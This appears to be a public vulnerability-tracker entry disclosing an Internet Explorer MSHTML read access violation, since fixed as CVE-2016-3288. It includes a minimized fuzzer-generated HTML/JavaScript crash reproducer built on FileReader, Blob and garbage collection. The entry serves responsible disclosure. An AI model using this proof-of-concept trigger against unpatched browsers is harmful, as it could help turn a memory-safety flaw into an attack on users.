Status: Fixed
Closed: Aug 2016
Microsoft Internet Explorer: Read AV in MSHTML!CMultiReadStreamLifetimeManager::ReleaseThreadStateInternal
Project Member Reported by mbarbella@google.com, May 17 2016
Still working on a minimized PoC, but attached the unminimized one for the time being. It's a bit flaky, so it's proving to be a little tough.

Looks like bug filing from CF was broken with the transition to Monorail (I can fix that soon), but in the meantime the report is https://cluster-fuzz.appspot.com/testcase?key=5178133082275840

Attachment: fuzz-125.html (1.5 MB)
Project Member Comment 1 by mbarbella@google.com, May 20 2016
Here's the (improved but not perfect) minimized test case. Sent it to MS today:

<script>
function eventhandler1() {
  CollectGarbage();
}

function eventhandler5() {
  try { /*FileReader*/ var var00063 = new FileReader(); } catch(err) { } //line 68
  try { /*Blob*/ var var00064 = new Blob(); } catch(err) { } //line 69
  try { var00063.readAsDataURL(var00064); } catch(err) { } //line 70
}
</script>

</noembed>
<applet onmouseout="eventhandler6()" truespeed="-1.86811e+009" spellcheck="A" frameborder="all" pluginurl="bottom" link="-32" part="file" ononline="eventhandler1()" onwebkittransitionend="eventhandler10()" onerror="eventhandler5()" char="void" direction="-1">iiThS9l_J8
</xmp>
</select>A7
<object results="object" default="black" aria_checked="1" action="row" onwebkitanimationiteration="eventhandler4()" playcount="bottom" playcount="poly" onsearch="eventhandler4()" oninput="eventhandler9()" translate="left" for="1" checked="-0.155515%" aria_selected="hsides" onerror="eventhandler1()" aria_valuemin="file">
Project Member Comment 2 by mbarbella@google.com, Aug 11 2016
Labels: -Restrict-View-Commit CVE-2016-3288 Fixed-2016-August-09
Status: Fixed